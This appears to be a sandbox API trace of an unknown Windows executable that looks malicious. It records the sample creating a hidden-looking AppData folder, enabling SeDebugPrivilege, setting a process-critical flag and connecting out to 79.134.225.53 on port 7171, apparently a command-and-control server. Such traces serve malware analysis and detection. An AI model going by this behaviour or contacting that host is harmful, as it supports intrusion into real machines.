[0173.387] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\Logs" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\b9c8f16e-2e51-4052-9ecb-f86ae5d96ef6\\logs"), fInfoLevelId=0x0, lpFileInformation=0x28e600 | out: lpFileInformation=0x28e600*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0173.387] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28e338) returned 1
[0173.387] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28e33c) returned 1
[0173.387] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\b9c8f16e-2e51-4052-9ecb-f86ae5d96ef6"), fInfoLevelId=0x0, lpFileInformation=0x28e600 | out: lpFileInformation=0x28e600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xdd692de0, ftCreationTime.dwHighDateTime=0x1d8a8be, ftLastAccessTime.dwLowDateTime=0xdee609e0, ftLastAccessTime.dwHighDateTime=0x1d8a8be, ftLastWriteTime.dwLowDateTime=0xdee609e0, ftLastWriteTime.dwHighDateTime=0x1d8a8be, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
[0173.388] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28e338) returned 1
[0173.388] CreateDirectoryW (lpPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\Logs" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\b9c8f16e-2e51-4052-9ecb-f86ae5d96ef6\\logs"), lpSecurityAttributes=0x0) returned 1
[0173.389] CreateDirectoryW (lpPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\Logs\\kEecfMwgj" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\b9c8f16e-2e51-4052-9ecb-f86ae5d96ef6\\logs\\keecfmwgj"), lpSecurityAttributes=0x0) returned 1
[0173.465] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe.config", nBufferLength=0x105, lpBuffer=0x28a558, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe.config", lpFilePart=0x0) returned 0x66
[0173.466] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28a7a0) returned 1
[0173.466] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe.config" (normalized: "c:\\users\\keecfmwgj\\desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x28aa64 | out: lpFileInformation=0x28aa64*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0173.466] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28a79c) returned 1
[0173.557] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3000, lpName=0x0) returned 0x318
[0173.558] memcpy (in: _Dst=0x3f0000, _Src=0x28fc158, _Size=0x3000 | out: _Dst=0x3f0000) returned 0x3f0000
[0173.558] CloseHandle (hObject=0x318) returned 1
[0174.007] GetWindowThreadProcessId (in: hWnd=0x7005c, lpdwProcessId=0x28e67c | out: lpdwProcessId=0x28e67c) returned 0x5c0
[0174.007] GetCurrentThreadId () returned 0x5c0
[0174.208] CoCreateGuid (in: pguid=0x28ed08 | out: pguid=0x28ed08*(Data1=0xd39aef25, Data2=0x5031, Data3=0x4fbe, Data4=([0]=0x84, [1]=0x31, [2]=0x16, [3]=0xe7, [4]=0xdb, [5]=0x5d, [6]=0x98, [7]=0x8b))) returned 0x0
[0174.312] CoTaskMemAlloc (cb=0x20e) returned 0x10abf80
[0174.312] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Threading.OverlappedData_Disabled", lpBuffer=0x10abf80, nSize=0x105 | out: lpBuffer="") returned 0x0
[0174.312] CoTaskMemFree (pv=0x10abf80)
[0174.312] CoTaskMemAlloc (cb=0x20e) returned 0x10abf80
[0174.312] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Threading.OverlappedData_MinCount", lpBuffer=0x10abf80, nSize=0x105 | out: lpBuffer="") returned 0x0
[0174.312] CoTaskMemFree (pv=0x10abf80)
[0175.010] EtwEventRegister () returned 0x0
[0175.435] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x28eabc | out: lpWSAData=0x28eabc) returned 0
[0175.450] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x348
[0175.953] setsockopt (s=0x348, level=65535, optname=128, optval="\x01", optlen=4) returned -1
[0175.953] closesocket (s=0x348) returned 0
[0175.954] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x348
[0176.002] setsockopt (s=0x348, level=65535, optname=128, optval="\x01", optlen=4) returned -1
[0176.002] closesocket (s=0x348) returned 0
[0176.016] GetCurrentProcess () returned 0xffffffff
[0176.016] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x28e8bc | out: TokenHandle=0x28e8bc*=0x348) returned 1
[0176.025] CloseHandle (hObject=0x348) returned 1
[0176.025] GetCurrentProcess () returned 0xffffffff
[0176.025] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x28e8d4 | out: TokenHandle=0x28e8d4*=0x348) returned 1
[0176.026] CloseHandle (hObject=0x348) returned 1
[0176.176] GetCurrentProcess () returned 0xffffffff
[0176.176] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x28e868 | out: TokenHandle=0x28e868*=0x348) returned 1
[0176.196] CloseHandle (hObject=0x348) returned 1
[0176.196] GetCurrentProcess () returned 0xffffffff
[0176.196] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x28e880 | out: TokenHandle=0x28e880*=0x348) returned 1
[0176.197] CloseHandle (hObject=0x348) returned 1
[0176.204] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x348
[0176.254] setsockopt (s=0x348, level=65535, optname=128, optval="\x01", optlen=4) returned 0
[0176.367] bind (s=0x348, addr=0x28da8b8*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0
[0176.404] WSAIoctl (in: s=0x348, dwIoControlCode=0xc8000006, lpvInBuffer=0x28ec2c, cbInBuffer=0x10, lpvOutBuffer=0x28ec18, cbOutBuffer=0x4, lpcbBytesReturned=0x28ec14, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x28ec18, lpcbBytesReturned=0x28ec14, lpOverlapped=0x0) returned 0
[0176.458] ConnectEx (in: s=0x348, name=0x28da6cc*(sa_family=2, sin_port=0x1c03, sin_addr="79.134.225.53"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x28ecbc, lpOverlapped=0x28cc11c | out: lpdwBytesSent=0x28ecbc*=0x0) returned 0
[0176.462] PeekMessageW (in: lpMsg=0x28f164, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x28f164) returned 0
[0176.463] PeekMessageW (in: lpMsg=0x28f164, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x28f164) returned 0
[0176.463] WaitMessage () returned 1
[0179.785] PeekMessageW (lpMsg=0x28f164, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0)
[0179.786] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x3b, wParam=0x50e, lParam=0x0) returned 0x1
[0179.786] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x11, wParam=0x0, lParam=0x0) returned 0x1
[0179.815] GetCurrentProcess () returned 0xffffffff
[0179.815] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x28e950 | out: TokenHandle=0x28e950*=0x348) returned 1
[0179.815] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x28e948 | out: lpLuid=0x28e948*(LowPart=0x14, HighPart=0)) returned 1
[0179.820] AdjustTokenPrivileges (in: TokenHandle=0x348, DisableAllPrivileges=0, NewState=0x28f3680*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
[0179.821] CloseHandle (hObject=0x348) returned 1
[0179.830] NtSetInformationProcess (ProcessHandle=0xffffffff, ProcessInformationClass=0x1d, ProcessInformation=0x28e990, ProcessInformationLength=0x4) returned 0x0
[0179.831] GetCurrentProcess () returned 0xffffffff
[0179.831] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x28e950 | out: TokenHandle=0x28e950*=0x348) returned 1
[0179.831] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x28e948 | out: lpLuid=0x28e948*(LowPart=0x14, HighPart=0)) returned 1
[0179.832] AdjustTokenPrivileges (in: TokenHandle=0x348, DisableAllPrivileges=0, NewState=0x28f3698*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
[0179.832] CloseHandle (hObject=0x348) returned 1
[0179.926] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\settings.bin", nBufferLength=0x105, lpBuffer=0x28e42c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\settings.bin", lpFilePart=0x0) returned 0x54
[0179.926] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28e66c) returned 1
[0179.927] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\settings.bin" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\b9c8f16e-2e51-4052-9ecb-f86ae5d96ef6\\settings.bin"), fInfoLevelId=0x0, lpFileInformation=0x28e930 | out: lpFileInformation=0x28e930*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0179.927] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28e668) returned 1
[0179.927] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\settings.bin", nBufferLength=0x105, lpBuffer=0x28e310, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\settings.bin", lpFilePart=0x0) returned 0x54
[0179.927] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28e828) returned 1
[0179.928] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\settings.bin" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\b9c8f16e-2e51-4052-9ecb-f86ae5d96ef6\\settings.bin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x348
[0179.929] GetFileType (hFile=0x348) returned 0x1
[0179.929] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28e824) returned 1
[0179.929] GetFileType (hFile=0x348) returned 0x1
[0179.929] WriteFile (in: hFile=0x348, lpBuffer=0x28f3c88*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x28e8ac, lpOverlapped=0x0 | out: lpBuffer=0x28f3c88*, lpNumberOfBytesWritten=0x28e8ac*=0x8, lpOverlapped=0x0) returned 1
[0179.930] CloseHandle (hObject=0x348) returned 1
[0179.934] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\settings.bak", nBufferLength=0x105, lpBuffer=0x28e434, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\settings.bak", lpFilePart=0x0) returned 0x54
[0179.934] DeleteFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\settings.bak" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\b9c8f16e-2e51-4052-9ecb-f86ae5d96ef6\\settings.bak")) returned 0
[0179.935] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x46, wParam=0x0, lParam=0x28f04c) returned 0x0
[0179.935] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x46, wParam=0x0, lParam=0x28f04c) returned 0x0
[0179.944] GetWindowPlacement (in: hWnd=0x7005c, lpwndpl=0x28edfc | out: lpwndpl=0x28edfc) returned 1
[0179.944] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x47, wParam=0x0, lParam=0x28f04c) returned 0x0
[0179.944] GetClientRect (in: hWnd=0x7005c, lpRect=0x28edac | out: lpRect=0x28edac) returned 1
[0179.944] GetWindowRect (in: hWnd=0x7005c, lpRect=0x28edac | out: lpRect=0x28edac) returned 1
[0179.944] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0xd, wParam=0x104, lParam=0x4ccc658) returned 0x0
[0179.944] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x47, wParam=0x0, lParam=0x28f04c) returned 0x0
[0179.945] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0xd, wParam=0x104, lParam=0x4ccc658) returned 0x0
[0179.945] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x83, wParam=0x1, lParam=0x28ec30) returned 0x0
[0179.946] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x1c, wParam=0x1, lParam=0xc6c) returned 0x0
[0179.946] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x1c, wParam=0x1, lParam=0xc6c) returned 0x0
[0179.946] NtdllDefWindowProc_W () returned 0x0
[0179.946] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x86, wParam=0x1, lParam=0x0) returned 0x1
[0179.946] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0xd, wParam=0x104, lParam=0x4ccc658) returned 0x0
[0179.947] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0xd, wParam=0x104, lParam=0x4ccc658) returned 0x0
[0179.947] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x6, wParam=0x1, lParam=0x0) returned 0x0
[0179.954] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x281, wParam=0x1, lParam=0xc000000f) returned 0x0
[0179.956] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x282, wParam=0x2, lParam=0x0) returned 0x0
[0179.956] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x7, wParam=0x0, lParam=0x0) returned 0x0
[0179.956] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x3b, wParam=0x50c, lParam=0x0)
[0179.957] DestroyCursor (hCursor=0x502a9) returned 1
[0179.959] GetWindowLongW (hWnd=0x7005c, nIndex=-20) returned 65792
[0179.960] DestroyWindow (hWnd=0x7005c)
[0179.960] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0
[0179.963] PostThreadMessageW (idThread=0x5c0, Msg=0x12, wParam=0x0, lParam=0x0) returned 1
[0179.966] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0
[0179.966] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0
[0179.966] DestroyWindow (hWnd=0x501fe)
[0179.966] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0
[0179.968] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x86, wParam=0x0, lParam=0x0) returned 0x1
[0179.968] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0xd, wParam=0x104, lParam=0x4ccc658) returned 0x0
[0179.969] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0xd, wParam=0x104, lParam=0x4ccc670) returned 0x0
[0179.969] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x6, wParam=0x0, lParam=0x0) returned 0x0
[0179.969] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x1c, wParam=0x0, lParam=0xc6c) returned 0x0
[0179.969] NtdllDefWindowProc_W () returned 0x0
[0179.969] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x8, wParam=0x0, lParam=0x0) returned 0x0
[0179.969] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x281, wParam=0x0, lParam=0xc000000f) returned 0x0
[0179.970] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x282, wParam=0x1, lParam=0x0) returned 0x0
[0179.970] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0
[0179.970] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0
Thread:
id = 19
os_tid = 0x860
Thread:
id = 20
os_tid = 0x50c
[0158.603] CoGetContextToken (in: pToken=0x103f72c | out: pToken=0x103f72c) returned 0x800401f0
[0158.603] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0173.933] CloseHandle (hObject=0x240) returned 1
[0173.933] RegCloseKey (hKey=0x23c) returned 0x0
[0173.934] CloseHandle (hObject=0x2b0) returned 1
[0173.935] CloseHandle (hObject=0x280) returned 1
[0173.935] RegCloseKey (hKey=0x254) returned 0x0
[0173.935] RegCloseKey (hKey=0x258) returned 0x0
Thread:
id = 21
os_tid = 0x410
Thread:
id = 30
os_tid = 0x438
Thread:
id = 31
os_tid = 0x5f8
Thread:
id = 32
os_tid = 0x4f8
Thread:
id = 39
os_tid = 0x940
[0170.990] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0170.992] CoGetContextToken (in: pToken=0x56ffb24 | out: pToken=0x56ffb24) returned 0x0
[0170.992] CObjectContext::QueryInterface () returned 0x0
[0170.992] CObjectContext::GetCurrentThreadType () returned 0x0
[0170.992] Release () returned 0x0
[0170.992] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1
[0170.993] CoUninitialize ()
Thread:
id = 40
os_tid = 0x948
Thread:
id = 41
os_tid = 0x94c
[0171.997] CoGetContextToken (in: pToken=0x136f954 | out: pToken=0x136f954) returned 0x0
[0171.997] CObjectContext::QueryInterface () returned 0x0
[0171.997] CObjectContext::GetCurrentThreadType () returned 0x0
[0171.997] Release () returned 0x0
[0171.998] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
Thread:
id = 42
os_tid = 0x95c
[0172.097] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0172.098] CoGetContextToken (in: pToken=0x580fcb4 | out: pToken=0x580fcb4) returned 0x0
[0172.098] CObjectContext::QueryInterface () returned 0x0
[0172.098] CObjectContext::GetCurrentThreadType () returned 0x0
[0172.098] Release () returned 0x0
[0172.099] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1
[0172.099] CoUninitialize ()
[0172.173] GetTimeZoneInformation (in: lpTimeZoneInformation=0x580f654 | out: lpTimeZoneInformation=0x580f654) returned 0x2
[0172.187] GetDynamicTimeZoneInformation (in: pTimeZoneInformation=0x580f4b0 | out: pTimeZoneInformation=0x580f4b0) returned 0x2
[0172.190] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time", ulOptions=0x0, samDesired=0x20019, phkResult=0x580f594 | out: phkResult=0x580f594*=0x304) returned 0x0
[0172.190] RegQueryValueExW (in: hKey=0x304, lpValueName="TZI", lpReserved=0x0, lpType=0x580f5b0, lpData=0x0, lpcbData=0x580f5ac*=0x0 | out: lpType=0x580f5b0*=0x3, lpData=0x0, lpcbData=0x580f5ac*=0x2c) returned 0x0
[0172.191] RegQueryValueExW (in: hKey=0x304, lpValueName="TZI", lpReserved=0x0, lpType=0x580f5b0, lpData=0x28de514, lpcbData=0x580f5ac*=0x2c | out: lpType=0x580f5b0*=0x3, lpData=0x28de514*, lpcbData=0x580f5ac*=0x2c) returned 0x0
[0172.191] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time\\Dynamic DST", ulOptions=0x0, samDesired=0x20019, phkResult=0x580f3e8 | out: phkResult=0x580f3e8*=0x0) returned 0x2
[0172.192] RegQueryValueExW (in: hKey=0x304, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x580f588, lpData=0x0, lpcbData=0x580f584*=0x0 | out: lpType=0x580f588*=0x1, lpData=0x0, lpcbData=0x580f584*=0x20) returned 0x0
[0172.193] RegQueryValueExW (in: hKey=0x304, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x580f588, lpData=0x28dea20, lpcbData=0x580f584*=0x20 | out: lpType=0x580f588*=0x1, lpData="@tzres.dll,-320", lpcbData=0x580f584*=0x20) returned 0x0
[0172.193] RegQueryValueExW (in: hKey=0x304, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x580f588, lpData=0x0, lpcbData=0x580f584*=0x0 | out: lpType=0x580f588*=0x1, lpData=0x0, lpcbData=0x580f584*=0x20) returned 0x0
[0172.193] RegQueryValueExW (in: hKey=0x304, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x580f588, lpData=0x28dea78, lpcbData=0x580f584*=0x20 | out: lpType=0x580f588*=0x1, lpData="@tzres.dll,-322", lpcbData=0x580f584*=0x20) returned 0x0
[0172.193] RegQueryValueExW (in: hKey=0x304, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x580f588, lpData=0x0, lpcbData=0x580f584*=0x0 | out: lpType=0x580f588*=0x1, lpData=0x0, lpcbData=0x580f584*=0x20) returned 0x0
[0172.193] RegQueryValueExW (in: hKey=0x304, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x580f588, lpData=0x28dead0, lpcbData=0x580f584*=0x20 | out: lpType=0x580f588*=0x1, lpData="@tzres.dll,-321", lpcbData=0x580f584*=0x20) returned 0x0
[0172.195] CoTaskMemAlloc (cb=0x20c) returned 0x10a67f8
[0172.195] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x10a67f8 | out: pszPath="C:\\Windows\\system32") returned 0x0
[0172.197] CoTaskMemFree (pv=0x10a67f8)
[0172.197] CoTaskMemAlloc (cb=0x20c) returned 0x10a67f8
[0172.197] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x580f5a4, pwszFileMUIPath=0x10a67f8, pcchFileMUIPath=0x580f5a8, pululEnumerator=0x580f59c | out: pwszLanguage=0x0, pcchLanguage=0x580f5a4, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x580f5a8, pululEnumerator=0x580f59c) returned 1
[0172.210] CoTaskMemFree (pv=0x0)
[0172.210] CoTaskMemFree (pv=0x10a67f8)
[0172.211] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x3f0001
[0172.215] CoTaskMemAlloc (cb=0x3ec) returned 0x10a67f8
[0172.215] LoadStringW (in: hInstance=0x3f0001, uID=0x140, lpBuffer=0x10a67f8, cchBufferMax=500 | out: lpBuffer="(UTC+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna") returned 0x3c
[0172.215] CoTaskMemFree (pv=0x10a67f8)
[0172.215] FreeLibrary (hLibModule=0x3f0001) returned 1
[0172.218] CoTaskMemAlloc (cb=0x20c) returned 0x10a67f8
[0172.218] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x10a67f8 | out: pszPath="C:\\Windows\\system32") returned 0x0
[0172.218] CoTaskMemFree (pv=0x10a67f8)
[0172.218] CoTaskMemAlloc (cb=0x20c) returned 0x10a67f8
[0172.218] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x580f5a4, pwszFileMUIPath=0x10a67f8, pcchFileMUIPath=0x580f5a8, pululEnumerator=0x580f59c | out: pwszLanguage=0x0, pcchLanguage=0x580f5a4, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x580f5a8, pululEnumerator=0x580f59c) returned 1
[0172.221] CoTaskMemFree (pv=0x0)
[0172.221] CoTaskMemFree (pv=0x10a67f8)
[0172.221] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x3f0001
[0172.224] CoTaskMemAlloc (cb=0x3ec) returned 0x10a67f8
[0172.224] LoadStringW (in: hInstance=0x3f0001, uID=0x142, lpBuffer=0x10a67f8, cchBufferMax=500 | out: lpBuffer="W. Europe Standard Time") returned 0x17
[0172.224] CoTaskMemFree (pv=0x10a67f8)
[0172.224] FreeLibrary (hLibModule=0x3f0001) returned 1
[0172.225] CoTaskMemAlloc (cb=0x20c) returned 0x10a67f8
[0172.225] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x10a67f8 | out: pszPath="C:\\Windows\\system32") returned 0x0
[0172.225] CoTaskMemFree (pv=0x10a67f8)
[0172.225] CoTaskMemAlloc (cb=0x20c) returned 0x10a67f8
[0172.225] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x580f5a4, pwszFileMUIPath=0x10a67f8, pcchFileMUIPath=0x580f5a8, pululEnumerator=0x580f59c | out: pwszLanguage=0x0, pcchLanguage=0x580f5a4, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x580f5a8, pululEnumerator=0x580f59c) returned 1
[0172.228] CoTaskMemFree (pv=0x0)
[0172.228] CoTaskMemFree (pv=0x10a67f8)
